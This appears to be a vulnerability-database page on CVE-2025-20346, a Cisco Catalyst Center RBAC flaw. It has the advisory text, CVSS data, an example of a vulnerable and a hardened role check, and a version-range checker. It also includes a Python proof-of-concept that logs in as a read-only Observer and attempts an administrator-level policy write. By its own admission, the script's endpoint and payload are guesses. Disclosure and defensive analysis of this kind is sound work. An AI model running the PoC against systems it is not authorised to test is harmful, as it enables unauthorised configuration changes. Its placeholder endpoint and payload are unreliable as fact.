Security Vulnerability Report
CVE-2025-20346 CVSS 4.3 MEDIUM

CVE-2025-20346

Published: 2025-11-13 17:15:46
Last Modified: 2025-11-19 17:16:37

Description

A vulnerability in Cisco Catalyst Center could allow an authenticated, remote attacker to execute operations that should require Administrator privileges. The attacker would need valid read-only user credentials.

This vulnerability is due to improper role-based access control (RBAC). An attacker could exploit this vulnerability by logging in to an affected system and modifying certain policy configurations. A successful exploit could allow the attacker to modify policy configurations that are reserved for the Administrator role. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer.

Weakness: CWE-269 (Improper Privilege Management), as recorded in the NVD entry reproduced under Raw JSON Data. The impact is integrity-only (I:L in the vector): a read-only account gains a write it should not have, with no confidentiality or availability impact claimed.
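The flaw class described above is an authorization check that stops at "is this caller logged in?" and never asks "may this caller's role perform this write?". The following is an added, generic illustration of that pattern and its fix, written for this page; it is not Cisco Catalyst Center code and says nothing about how that product implements RBAC. The role names Observer and Administrator come from the description; the permission table, the PolicyStore, and the handler names are hypothetical.

```python
"""Improper RBAC (CWE-269): vulnerable handler beside a deny-by-default one."""
from dataclasses import dataclass, field
from enum import Enum


class Role(Enum):
    OBSERVER = "observer"              # read-only role named in the advisory
    ADMINISTRATOR = "administrator"    # role that should own policy writes


@dataclass(frozen=True)
class Session:
    """What an authenticated API call carries: who, with which role."""
    username: str
    role: Role


@dataclass
class PolicyStore:
    policies: dict = field(default_factory=dict)


class Forbidden(Exception):
    pass


# --- Vulnerable pattern ---
# The handler confirms the caller is authenticated but never consults the
# caller's role, so any valid session (Observer included) can overwrite a
# policy. This is the shape of bug the CVE description refers to.
def update_policy_vulnerable(store, session, name, body):
    if session is None:
        raise Forbidden("authentication required")
    store.policies[name] = dict(body)
    return store.policies[name]


# --- Hardened pattern ---
# An explicit permission table keyed by (resource, action), consulted before
# every state change. Deny by default: an unlisted pair or role is refused.
PERMISSIONS = {
    ("policy", "read"): frozenset({Role.OBSERVER, Role.ADMINISTRATOR}),
    ("policy", "write"): frozenset({Role.ADMINISTRATOR}),
}


def authorize(session, resource, action):
    if session is None:
        raise Forbidden("authentication required")
    allowed = PERMISSIONS.get((resource, action), frozenset())
    if session.role not in allowed:
        raise Forbidden(f"{session.role.value} may not {action} {resource}")


def read_policy(store, session, name):
    authorize(session, "policy", "read")
    return store.policies.get(name)


def update_policy_hardened(store, session, name, body):
    authorize(session, "policy", "write")   # decided before any mutation
    store.policies[name] = dict(body)
    return store.policies[name]


def demo():
    """Drive both handlers with an Observer and an Administrator session and
    return which operations each handler allowed (constructed sample data)."""
    observer = Session("observer_user", Role.OBSERVER)
    admin = Session("admin_user", Role.ADMINISTRATOR)
    body = {"policyDescription": "changed by observer"}
    outcome = {}

    store = PolicyStore({"default": {"policyDescription": "original"}})
    update_policy_vulnerable(store, observer, "default", body)
    outcome["vulnerable_observer_write"] = store.policies["default"] == body

    store = PolicyStore({"default": {"policyDescription": "original"}})
    try:
        update_policy_hardened(store, observer, "default", body)
        outcome["hardened_observer_write"] = True
    except Forbidden:
        outcome["hardened_observer_write"] = False
    outcome["hardened_observer_read"] = read_policy(store, observer, "default") is not None
    update_policy_hardened(store, admin, "default", body)
    outcome["hardened_admin_write"] = store.policies["default"] == body
    return outcome


if __name__ == "__main__":
    for check, allowed in demo().items():
        print(f"{check}: {'allowed' if allowed else 'denied'}")
```

The point of the hardened version is where the decision is made: a role lookup against a table that covers every mutating operation, evaluated before the store is touched, rather than a role check that exists only in the UI or only on some endpoints.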

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cisco:catalyst_center:*:*:*:*:*:*:*:* - VULNERABLE
Affected versions: per the NVD configuration, all Cisco Catalyst Center releases before 2.3.7.10 (versionEndExcluding 2.3.7.10); 2.3.7.10 and later fall outside the vulnerable range.
Confirm against the affected-version table and fixed releases in Cisco's official advisory (linked under References) before relying on this range.
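Checking a deployed version against an NVD range by eye is error-prone (2.3.7.9 sorts after 2.3.7.10 as a string). The following is an added example, not code from this page or from Cisco, that applies the cpeMatch entry above to a version string. It embeds the single cpeMatch node from this CVE's NVD record and goes beyond it by handling all four NVD range keys (versionStartIncluding/Excluding, versionEndIncluding/Excluding), so it can be reused on other NVD records. Build-number suffixes such as "-70045" are an assumed format and are ignored by the comparison.

```python
"""Apply an NVD cpeMatch version range to a product version string."""
import re

# The cpeMatch node for CVE-2025-20346, copied from this page's Raw JSON
# (matchCriteriaId omitted; it plays no part in the version test).
NVD_CPE_MATCHES = [
    {
        "vulnerable": True,
        "criteria": "cpe:2.3:a:cisco:catalyst_center:*:*:*:*:*:*:*:*",
        "versionEndExcluding": "2.3.7.10",
    }
]


def parse_version(version):
    """'2.3.7.9' -> (2, 3, 7, 9). A non-numeric tail on a component (assumed
    build tag, e.g. '10-70045') is dropped, so builds must be compared separately."""
    parts = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        if m is None:
            raise ValueError(f"non-numeric version component {piece!r} in {version!r}")
        parts.append(int(m.group(0)))
    return tuple(parts)


def compare_versions(a, b):
    """Return -1, 0 or 1; shorter tuples are zero-padded ('2.3.7' == '2.3.7.0')."""
    va, vb = parse_version(a), parse_version(b)
    width = max(len(va), len(vb))
    va += (0,) * (width - len(va))
    vb += (0,) * (width - len(vb))
    return (va > vb) - (va < vb)


def cpe_fields(criteria):
    """Split a CPE 2.3 formatted string into its 13 colon-separated fields
    (escaped colons are not handled; none occur in this record)."""
    fields = criteria.split(":")
    if len(fields) != 13 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 string: {criteria!r}")
    return fields


def version_in_match(version, match):
    """Apply whichever of the four optional NVD range bounds are present."""
    bounds = (
        ("versionStartIncluding", lambda c: c >= 0),
        ("versionStartExcluding", lambda c: c > 0),
        ("versionEndIncluding", lambda c: c <= 0),
        ("versionEndExcluding", lambda c: c < 0),
    )
    for key, ok in bounds:
        if key in match and not ok(compare_versions(version, match[key])):
            return False
    return True


def is_affected(vendor, product, version, cpe_matches=NVD_CPE_MATCHES):
    """True if any vulnerable cpeMatch entry covers (vendor, product, version)."""
    for match in cpe_matches:
        if not match.get("vulnerable", False):
            continue
        fields = cpe_fields(match["criteria"])
        if fields[3] != vendor or fields[4] != product:
            continue
        exact = fields[5]   # a literal version in the CPE, or '*' for "use the range keys"
        if exact != "*" and compare_versions(version, exact) != 0:
            continue
        if version_in_match(version, match):
            return True
    return False


if __name__ == "__main__":
    for v in ("2.3.5.3", "2.3.7.9", "2.3.7.10", "2.3.7.10-70045"):
        state = "AFFECTED" if is_affected("cisco", "catalyst_center", v) else "not in range"
        print(f"catalyst_center {v}: {state}")
```

Feed it the `cpeMatch` list from any NVD record and the version reported by the appliance; a result of "not in range" means only that NVD's range does not cover the version, which is why the vendor advisory remains the authority on fixed releases.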

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-20346 PoC - Cisco Catalyst Center RBAC Bypass

This PoC demonstrates privilege escalation via RBAC bypass in Cisco
Catalyst Center: a user holding only the Observer (read-only) role attempts
a policy-modification operation that should require the Administrator role.

Note: This is for educational and authorized testing purposes only.
"""
import sys

import requests
import urllib3

# Configuration: replace with the target and a valid Observer-role account.
TARGET_HOST = "https://target-cisco-catalyst-center.local"
OBSERVER_USERNAME = "observer_user"
OBSERVER_PASSWORD = "observer_password"

# The PoC deliberately skips TLS verification (verify=False) for lab targets;
# silence the per-request InsecureRequestWarning rather than the cause.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit_cve_2025_20346():
    """
    Demonstrates the RBAC bypass vulnerability in Cisco Catalyst Center.
    An Observer role user can modify administrator-level policy configurations.
    Returns True if the write was accepted (target looks vulnerable), else False.
    """
    session = requests.Session()

    # Step 1: Log in with Observer credentials.
    # The Catalyst Center token endpoint takes the credentials as HTTP Basic
    # auth and returns {"Token": "..."}; the token then goes in X-Auth-Token.
    login_url = f"{TARGET_HOST}/dna/system/api/v1/auth/token"

    try:
        response = session.post(
            login_url,
            auth=(OBSERVER_USERNAME, OBSERVER_PASSWORD),
            verify=False,
            timeout=30,
        )
        if response.status_code != 200:
            print(f"[-] Login failed: {response.status_code}")
            return False

        token = response.json().get("Token")
        if not token:
            print("[-] Login response did not contain a Token field")
            return False
        print("[+] Successfully logged in as Observer user")
        print(f"[+] Access token obtained: {token[:20]}...")

        # Step 2: Attempt to modify an admin-level policy configuration.
        # This operation should require the Administrator role but, on an
        # affected release, is accepted for the Observer role.
        # Caveat: the Cisco advisory does not name the affected endpoint or
        # request body. The path and payload below are this PoC's placeholders
        # and must be replaced with the actual policy operation under test.
        admin_policy_url = f"{TARGET_HOST}/dna/intent/api/v1/policy"
        headers = {
            "X-Auth-Token": token,
            "Content-Type": "application/json",
        }
        malicious_payload = {
            "policyName": "MaliciousPolicy",
            "policyDescription": "Modified by Observer via RBAC bypass",
            "policyType": "admin",
            "settings": {
                "privilegedAccess": True,
                "modifySystemConfig": True,
            },
        }

        response = session.post(
            admin_policy_url,
            headers=headers,
            json=malicious_payload,
            verify=False,
            timeout=30,
        )

        if response.status_code in (200, 201):
            print("[+] VULNERABLE: Successfully modified admin policy as Observer user!")
            try:
                print(f"[+] Policy ID: {response.json().get('id')}")
            except ValueError:
                print(f"[+] Response: {response.text}")
            return True

        # A correctly enforced role check rejects the write from a read-only
        # caller (typically 401/403) instead of accepting it.
        print(f"[-] Request blocked or failed: {response.status_code}")
        print(f"[-] Response: {response.text}")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-20346 - Cisco Catalyst Center RBAC Bypass PoC")
    print("=" * 60)
    sys.exit(0 if exploit_cve_2025_20346() else 1)
```

Note that a 200/201 on the placeholder endpoint proves only that the request was accepted, not that a protected policy changed; during authorized testing, read the policy back with an Administrator account and compare before and after.

References

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-privesc-catc-rYjReeLU (Cisco Security Advisory, tagged Vendor Advisory in the NVD record)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-20346",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-13T17:15:45.630",
    "lastModified": "2025-11-19T17:16:36.880",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability in Cisco Catalyst Center could allow an authenticated, remote attacker to execute operations that should require Administrator privileges. The attacker would need valid read-only user credentials.\r\n\r\nThis vulnerability is due to improper role-based access control (RBAC). An attacker could exploit this vulnerability by logging in to an affected system and modifying certain policy configurations. A successful exploit could allow the attacker to modify policy configurations that are reserved for the Administrator role. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-269"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cisco:catalyst_center:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.3.7.10",
                "matchCriteriaId": "5C88A587-FFF4-493C-823F-F958374FC6B6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-privesc-catc-rYjReeLU",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```